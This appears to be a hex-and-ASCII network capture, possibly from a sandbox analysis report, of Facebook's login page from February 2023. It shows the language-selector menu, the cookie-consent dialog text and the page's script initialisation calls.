                                                                                    2023-02-07 18:46:15 UTC1281INData Raw: 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 64 5f 47 65 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 50 6f 72 74 75 67 75 5c 75 30 30 65 61 73 20 28 42 72 61 73 69 6c 29 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 70 74 5f 50 54 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 65 5f 53 6e 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 50 6f 72 74 75 67 75 5c 75
                                                                                    Data Ascii: m":"__markup_3310c079_0_d_Ge"},"label":"Portugu\u00eas (Brasil)","title":"","className":"headerItem"},{"class":"headerItem","value":"pt_PT","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_e_Sn"},"label":"Portugu\u
                                                                                    2023-02-07 18:46:15 UTC1283INData Raw: 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 65 6c 5f 47 52 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6c 5f 52 59 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 30 33 39 35 5c 75 30 33 62 62 5c 75 30 33 62 62 5c 75 30 33 62 37 5c 75 30 33 62 64 5c 75 30 33 62 39 5c 75 30 33 62 61 5c 75 30 33 61 63 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 72 75 5f
                                                                                    Data Ascii: headerItem","value":"el_GR","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_l_RY"},"label":"\u0395\u03bb\u03bb\u03b7\u03bd\u03b9\u03ba\u03ac","title":"","className":"headerItem"},{"class":"headerItem","value":"ru_
                                                                                    2023-02-07 18:46:15 UTC1284INData Raw: 75 37 30 36 33 29 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 7a 68 5f 43 4e 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 73 5f 65 4d 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 34 65 32 64 5c 75 36 35 38 37 28 5c 75 37 62 38 30 5c 75 34 66 35 33 29 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b
                                                                                    Data Ascii: u7063)","title":"","className":"headerItem"},{"class":"headerItem","value":"zh_CN","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_s_eM"},"label":"\u4e2d\u6587(\u7b80\u4f53)","title":"","className":"headerItem"},{
                                                                                    2023-02-07 18:46:15 UTC1285INData Raw: 69 64 65 22 7d 5d 2c 22 61 74 74 72 69 62 75 74 65 73 22 3a 7b 22 64 61 74 61 2d 74 65 73 74 69 64 22 3a 22 63 6f 6f 6b 69 65 2d 70 6f 6c 69 63 79 2d 6d 61 6e 61 67 65 2d 64 69 61 6c 6f 67 22 7d 2c 22 63 6c 61 73 73 4e 61 6d 65 73 22 3a 5b 22 5f 39 6f 2d 77 22 5d 7d 2c 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 73 64 22 7d 5d 2c 32 5d 2c 5b 22 5f 5f 69 6e 73 74 5f 65 35 61 64 32 34 33 64 5f 30 5f 30 5f 77 62 22 2c 5b 22 50 6f 70 6f 76 65 72 4d 65 6e 75 22 2c 22 5f 5f 69 6e 73 74 5f 31 64 65 31 34 36 64 63 5f 30 5f 30 5f 69 42 22 2c 22 5f 5f 65 6c 65 6d 5f 65 63 37 37 61 66 62 64 5f 30 5f 30 5f 43 6f 22 2c 22 5f 5f 69 6e 73 74 5f 30 32 31 38 32 30 31 35 5f 30 5f 30 5f 68 62 22 2c 22 50 6f 70 6f 76 65 72 4d 65
                                                                                    Data Ascii: ide"}],"attributes":{"data-testid":"cookie-policy-manage-dialog"},"classNames":["_9o-w"]},{"__m":"__markup_9f5fac15_0_0_sd"}],2],["__inst_e5ad243d_0_0_wb",["PopoverMenu","__inst_1de146dc_0_0_iB","__elem_ec77afbd_0_0_Co","__inst_02182015_0_0_hb","PopoverMe
                                                                                    2023-02-07 18:46:15 UTC1287INData Raw: 74 6c 65 5c 22 3e 41 6c 6c 6f 77 20 74 68 65 20 75 73 65 20 6f 66 20 63 6f 6f 6b 69 65 73 20 66 72 6f 6d 20 46 61 63 65 62 6f 6f 6b 20 6f 6e 20 74 68 69 73 20 62 72 6f 77 73 65 72 3f 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 67 5c 22 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 31 5c 22 3e 57 65 20 75 73 65 20 63 6f 6f 6b 69 65 73 20 61 6e 64 20 73 69 6d 69 6c 61 72 20 74 65 63 68 6e 6f 6c 6f 67 69 65 73 20 74 6f 20 68 65 6c 70 3a 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 32 5c 22 3e
                                                                                    Data Ascii: tle\">Allow the use of cookies from Facebook on this browser?\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9o-g\">\u003Cdiv>\u003Cdiv>\u003Cdiv class=\"_9xo1\">We use cookies and similar technologies to help:\u003C\/div>\u003Cdiv class=\"_9xo2\">
                                                                                    2023-02-07 18:46:15 UTC1288INData Raw: 3e 2e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 70 76 5c 22 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 70 77 5c 22 3e 45 73 73 65 6e 74 69 61 6c 20 63 6f 6f 6b 69 65 73 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 54 68 65 73 65 20 63 6f 6f 6b 69 65 73 20 61 72 65 20 72 65 71 75 69 72 65 64 20 74 6f 20 75 73 65 20 4d 65 74 61 20 50 72 6f 64 75 63 74 73 2e 20 54 68 65 79 5c 75 32 30 31 39 72 65 20 6e 65 0d 0a
                                                                                    Data Ascii: >.\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cdiv>\u003Cdiv class=\"_9xpv\">\u003Cdiv>\u003Cdiv class=\"_9xpw\">Essential cookies\u003C\/div>\u003Cdiv>These cookies are required to use Meta Products. They\u2019re ne
                                                                                    2023-02-07 18:46:15 UTC1289INData Raw: 32 64 62 35 0d 0a 63 65 73 73 61 72 79 20 66 6f 72 20 74 68 65 73 65 20 73 69 74 65 73 20 74 6f 20 77 6f 72 6b 20 61 73 20 69 6e 74 65 6e 64 65 64 2e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 30 5c 22 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6b 5c 22 3e 4f 70 74 69 6f 6e 61 6c 20 63 6f 6f 6b 69 65 73 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 3e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78
                                                                                    Data Ascii: 2db5cessary for these sites to work as intended.\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo0\">\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cp class=\"_9o-k\">Optional cookies\u003C\/p>\u003Cp>\u003C\/p>\u003Cdiv>\u003Cdiv>\u003Cdiv class=\"_9x
                                                                                    2023-02-07 18:46:15 UTC1290INData Raw: 2f 6c 69 3e 5c 75 30 30 33 43 6c 69 20 63 6c 61 73 73 3d 5c 22 5f 39 78 71 30 5c 22 3e 4f 74 68 65 72 20 63 6f 6d 70 61 6e 69 65 73 20 77 69 6c 6c 20 72 65 63 65 69 76 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 79 6f 75 20 62 79 20 75 73 69 6e 67 20 63 6f 6f 6b 69 65 73 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 5c 2f 75 6c 3e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 70 61 6d 20 5f 39 6f 2d 6e 20 75 69 42 6f 78 47 72 61 79 5c 22 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6f 5c 22 3e 49 66 20 79 6f 75 20 64 6f 6e 5c 75 32 30 31 39 74 20 61 6c 6c 6f 77 20 74 68 65 73 65 20 63 6f 6f
                                                                                    Data Ascii: /li>\u003Cli class=\"_9xq0\">Other companies will receive information about you by using cookies\u003C\/li>\u003C\/ul>\u003C\/p>\u003C\/div>\u003C\/p>\u003Cp>\u003Cdiv class=\"pam _9o-n uiBoxGray\">\u003Cp class=\"_9o-o\">If you don\u2019t allow these coo
                                                                                    2023-02-07 18:46:15 UTC1292INData Raw: 6f 74 68 65 72 20 70 61 72 74 6e 65 72 73 20 70 72 6f 76 69 64 65 20 75 73 20 61 62 6f 75 74 20 79 6f 75 72 20 61 63 74 69 76 69 74 79 20 6f 66 66 20 4d 65 74 61 20 43 6f 6d 70 61 6e 79 20 50 72 6f 64 75 63 74 73 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 73 69 74 65 73 20 61 6e 64 20 61 70 70 73 2e 20 59 6f 75 20 63 61 6e 20 63 6f 6e 74 72 6f 6c 20 77 68 65 74 68 65 72 20 77 65 20 75 73 65 20 74 68 69 73 20 64 61 74 61 20 74 6f 20 73 68 6f 77 20 79 6f 75 20 61 64 73 20 69 6e 20 79 6f 75 72 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 73 65 74 74 69 6e 67 73 5c 2f 61 64 73 5c 2f 5c 22 3e 61 64 20 73 65 74 74 69 6e 67 73 5c 75 30 30 33 43 5c 2f 61 3e 2e 5c 75 30 30 33
                                                                                    Data Ascii: other partners provide us about your activity off Meta Company Products, including websites and apps. You can control whether we use this data to show you ads in your \u003Ca href=\"https:\/\/www.facebook.com\/settings\/ads\/\">ad settings\u003C\/a>.\u003
                                                                                    2023-02-07 18:46:15 UTC1293INData Raw: 6f 6e 20 4d 65 74 61 20 50 72 6f 64 75 63 74 73 2e 20 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 68 65 6c 70 5c 2f 32 32 30 37 32 35 36 36 39 36 31 38 32 36 32 37 5c 22 3e 6f 66 66 2d 46 61 63 65 62 6f 6f 6b 20 61 63 74 69 76 69 74 79 5c 75 30 30 33 43 5c 2f 61 3e 2c 20 68 6f 77 20 77 65 20 75 73 65 20 69 74 2c 20 61 6e 64 20 68 6f 77 20 79 6f 75 20 63 61 6e 20 6d 61 6e 61 67 65 20 69 74 2e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20
                                                                                    Data Ascii: on Meta Products. Learn more about \u003Ca href=\"https:\/\/www.facebook.com\/help\/2207256696182627\">off-Facebook activity\u003C\/a>, how we use it, and how you can manage it.\u003C\/p>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cdiv
                                                                                    2023-02-07 18:46:15 UTC1294INData Raw: 79 6e 63 6c 61 7a 79 5c 22 3e 44 69 67 69 74 61 6c 20 41 64 76 65 72 74 69 73 69 6e 67 20 41 6c 6c 69 61 6e 63 65 20 6f 66 20 43 61 6e 61 64 61 5c 75 30 30 33 43 5c 2f 61 3e 20 69 6e 20 43 61 6e 61 64 61 20 6f 72 20 74 68 65 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 79 6f 75 72 6f 6e 6c 69 6e 65 63 68 6f 69 63 65 73 2e 63 6f 6d 5c 75 30 30 32 35 32 46 26 61 6d 70 3b 68 3d 41 54 32 37 4e 47 64 4d 57 76 70 46 43 5f 6d 53 2d 6b 32 52 2d 4e 34 34 36 49 42 44 6a 71 78 34 62 41 5f 59 68 70 59 4c 38 66 6a 67 67 37 42 39 44 46 45 78 44 74 68 51 73 78 70 57 6d
                                                                                    Data Ascii: ynclazy\">Digital Advertising Alliance of Canada\u003C\/a> in Canada or the \u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fwww.youronlinechoices.com\u00252F&amp;h=AT27NGdMWvpFC_mS-k2R-N446IBDjqx4bA_YhpYL8fjgg7B9DFExDthQsxpWm
                                                                                    2023-02-07 18:46:15 UTC1296INData Raw: 41 54 32 61 76 78 52 39 69 6a 66 31 4c 6c 33 74 66 63 57 61 52 46 5f 4e 72 78 38 31 41 75 42 38 42 73 32 70 79 50 42 42 62 32 58 71 49 6b 6d 32 65 55 50 79 32 33 43 36 48 68 31 77 38 58 72 51 59 6d 76 42 38 31 4b 65 6f 79 69 78 55 62 69 4b 55 62 72 4b 32 75 76 63 33 53 48 4f 63 47 31 72 50 2d 6c 51 77 4a 47 7a 68 64 58 42 6c 46 5f 6a 67 64 46 49 63 66 46 37 65 49 74 49 38 66 77 37 4b 36 47 63 7a 4f 79 63 4e 7a 41 6f 4b 2d 68 30 33 65 78 4c 43 41 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 44 69 67 69 74 61 6c 20 41 64 76 65 72 74 69 73 69 6e 67 20 41 6c 6c 69 61 6e 63 65 20 6f 66 20 43 61 6e 61 64 61
                                                                                    Data Ascii: AT2avxR9ijf1Ll3tfcWaRF_Nrx81AuB8Bs2pyPBBb2XqIkm2eUPy23C6Hh1w8XrQYmvB81KeoyixUbiKUbrK2uvc3SHOcG1rP-lQwJGzhdXBlF_jgdFIcfF7eItI8fw7K6GczOycNzAoK-h03exLCA\" target=\"_blank\" rel=\"nofollow\" data-lynx-mode=\"asynclazy\">Digital Advertising Alliance of Canada
                                                                                    2023-02-07 18:46:15 UTC1297INData Raw: 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 65 20 63 6f 6e 74 72 6f 6c 73 20 6f 66 66 65 72 65 64 20 62 79 20 70 6f 70 75 6c 61 72 20 62 72 6f 77 73 65 72 73 20 61 74 20 74 68 65 20 6c 69 6e 6b 73 20 62 65 6c 6f 77 2e 20 43 65 72 74 61 69 6e 20 70 61 72 74 73 20 6f 66 20 4d 65 74 61 20 50 72 6f 64 75 63 74 73 20 6d 61 79 20 6e 6f 74 20 77 6f 72 6b 20 70 72 6f 70 65 72 6c 79 20 69 66 20 79 6f 75 20 68 61 76 65 20 64 69 73 61 62 6c 65 64 20 62 72 6f 77 73 65 72 20 63 6f 6f 6b 69 65 73 2e 20 50 6c 65 61 73 65 20 62 65 20 61 77 61 72 65 20 74 68 61 74 20 74 68 65 73 65 20 63 6f 6e 74 72 6f 6c 73 20 61 72 65 20 64 69 73 74 69 6e 63 74 20 66 72 6f 6d 20 74 68 65 20 63 6f 6e 74 72 6f 6c 73 20 74 68 61 74 20 46 61 63 65 62 6f 6f 6b 20 6f 66 66
                                                                                    Data Ascii: information about the controls offered by popular browsers at the links below. Certain parts of Meta Products may not work properly if you have disabled browser cookies. Please be aware that these controls are distinct from the controls that Facebook off
                                                                                    2023-02-07 18:46:15 UTC1299INData Raw: 67 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 46 69 72 65 66 6f 78 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 73 75 70 70 6f 72 74 2e 61 70 70 6c 65 2e 63 6f 6d 5c 75 30 30 32 35 32 46 65 6e 2d 69 65 5c 75 30 30 32 35 32 46 67 75 69 64 65 5c 75 30 30 32 35 32 46 73 61 66 61 72 69 5c 75 30 30 32 35 32 46 73 66 72 69 31 31 34
                                                                                    Data Ascii: g\" target=\"_blank\" rel=\"nofollow\" data-lynx-mode=\"asynclazy\">Firefox\u003C\/a>\u003C\/li>\u003Cli>\u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fsupport.apple.com\u00252Fen-ie\u00252Fguide\u00252Fsafari\u00252Fsfri114
                                                                                    2023-02-07 18:46:15 UTC1300INData Raw: 32 39 30 36 0d 0a 56 42 38 59 67 4b 79 39 54 68 4b 72 34 54 52 59 67 78 7a 39 74 4c 46 4e 77 73 4c 67 6a 36 73 75 73 65 4e 41 75 49 4c 7a 72 30 4e 45 76 54 48 6d 48 71 53 70 2d 6a 6f 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 5c 22 3e 4f 70 65 72 61 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 5c 2f 75 6c 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20
                                                                                    Data Ascii: 2906VB8YgKy9ThKr4TRYgxz9tLFNwsLgj6suseNAuILzr0NEvTHmHqSp-jo\" target=\"_blank\" rel=\"nofollow\" data-lynx-mode=\"async\">Opera\u003C\/a>\u003C\/li>\u003C\/ul>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv
                                                                                    2023-02-07 18:46:15 UTC1302INData Raw: 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 61 5f 63 73 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 4e 65 64 65 72 6c 61 6e 64 73 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 62 5f 2b 4d 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 4e 6f 72 73 6b 20 28 62 6f 6b 6d 5c 75 30 30 65 35 6c 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 63 5f 6a 39 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 50 6f 6c 73 6b 69 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 64 5f 47 65 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 50 6f 72 74 75 67 75 5c 75 30 30 65 61 73 20 28 42 72 61 73 69 6c 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30
                                                                                    Data Ascii: markup_3310c079_0_a_cs",{"__html":"Nederlands"},1],["__markup_3310c079_0_b_+M",{"__html":"Norsk (bokm\u00e5l)"},1],["__markup_3310c079_0_c_j9",{"__html":"Polski"},1],["__markup_3310c079_0_d_Ge",{"__html":"Portugu\u00eas (Brasil)"},1],["__markup_3310c079_0
                                                                                    2023-02-07 18:46:15 UTC1303INData Raw: 7d 2c 31 5d 5d 2c 22 65 6c 65 6d 65 6e 74 73 22 3a 5b 5b 22 5f 5f 65 6c 65 6d 5f 38 33 35 63 36 33 33 61 5f 30 5f 30 5f 63 30 22 2c 22 6c 6f 67 69 6e 5f 66 6f 72 6d 22 2c 31 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 31 65 64 64 34 39 38 30 5f 30 5f 30 5f 77 38 22 2c 22 6c 6f 67 69 6e 62 75 74 74 6f 6e 22 2c 31 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 66 34 36 66 34 39 34 36 5f 30 5f 30 5f 70 77 22 2c 22 75 5f 30 5f 31 5f 52 38 22 2c 31 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 66 34 36 66 34 39 34 36 5f 30 5f 31 5f 72 4c 22 2c 22 75 5f 30 5f 32 5f 50 57 22 2c 31 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 31 5f 6c 76 22 2c 22 75 5f 30 5f 34 5f 79 76 22 2c 31 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 59 44 22 2c 22 70 61 67 65 6c
                                                                                    Data Ascii: },1]],"elements":[["__elem_835c633a_0_0_c0","login_form",1],["__elem_1edd4980_0_0_w8","loginbutton",1],["__elem_f46f4946_0_0_pw","u_0_1_R8",1],["__elem_f46f4946_0_1_rL","u_0_2_PW",1],["__elem_a588f507_0_1_lv","u_0_4_yv",1],["__elem_9f5fac15_0_0_YD","pagel
                                                                                    2023-02-07 18:46:15 UTC1304INData Raw: 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 30 5f 36 47 22 7d 5d 5d 5d 2c 5b 22 4b 65 79 62 6f 61 72 64 41 63 74 69 76 69 74 79 4c 6f 67 67 65 72 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 46 6f 63 75 73 52 69 6e 67 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 45 72 72 6f 72 4d 65 73 73 61 67 65 43 6f 6e 73 6f 6c 65 22 2c 22 6c 69 73 74 65 6e 46 6f 72 55 6e 63 61 75 67 68 74 45 72 72 6f 72 73 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 48 61 72 64 77 61 72 65 43 53 53 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 57 65 62 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 53 65 6c 65 63 74 6f 72 48 61 6e 64 6c 65 72 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 65 63 37 37 61 66 62 64 5f 30 5f 30 5f 43 6f 22 2c 22 5f 5f 69 6e 73 74 5f 30 32 31 38 32
                                                                                    Data Ascii: m_a588f507_0_0_6G"}]]],["KeyboardActivityLogger","init",[],[]],["FocusRing","init",[],[]],["ErrorMessageConsole","listenForUncaughtErrors",[],[]],["HardwareCSS","init",[],[]],["WebCookieLocaleSelectorHandler","init",["__elem_ec77afbd_0_0_Co","__inst_02182
                                                                                    2023-02-07 18:46:15 UTC1306INData Raw: 74 5f 65 35 61 64 32 34 33 64 5f 30 5f 30 5f 77 62 22 5d 2c 5b 22 5f 5f 69 6e 73 74 5f 31 64 65 31 34 36 64 63 5f 30 5f 30 5f 69 42 22 5d 2c 5b 22 43 6f 6f 6b 69 65 41 63 63 6f 72 64 69 6f 6e 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 33 5f 56 4a 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 33 5f 56 4a 22 7d 2c 22 5f 39 6e 67 62 22 2c 22 2e 5f 39 6e 67 61 22 2c 22 2e 5f 39 6e 67 64 22 2c 22 2e 5f 39 6e 67 67 22 5d 5d 2c 5b 22 43 6f 6f 6b 69 65 41 63 63 6f 72 64 69 6f 6e 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 34 5f 30 33 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 34 5f 30 33
                                                                                    Data Ascii: t_e5ad243d_0_0_wb"],["__inst_1de146dc_0_0_iB"],["CookieAccordion","init",["__elem_a588f507_0_3_VJ"],[{"__m":"__elem_a588f507_0_3_VJ"},"_9ngb","._9nga","._9ngd","._9ngg"]],["CookieAccordion","init",["__elem_a588f507_0_4_03"],[{"__m":"__elem_a588f507_0_4_03
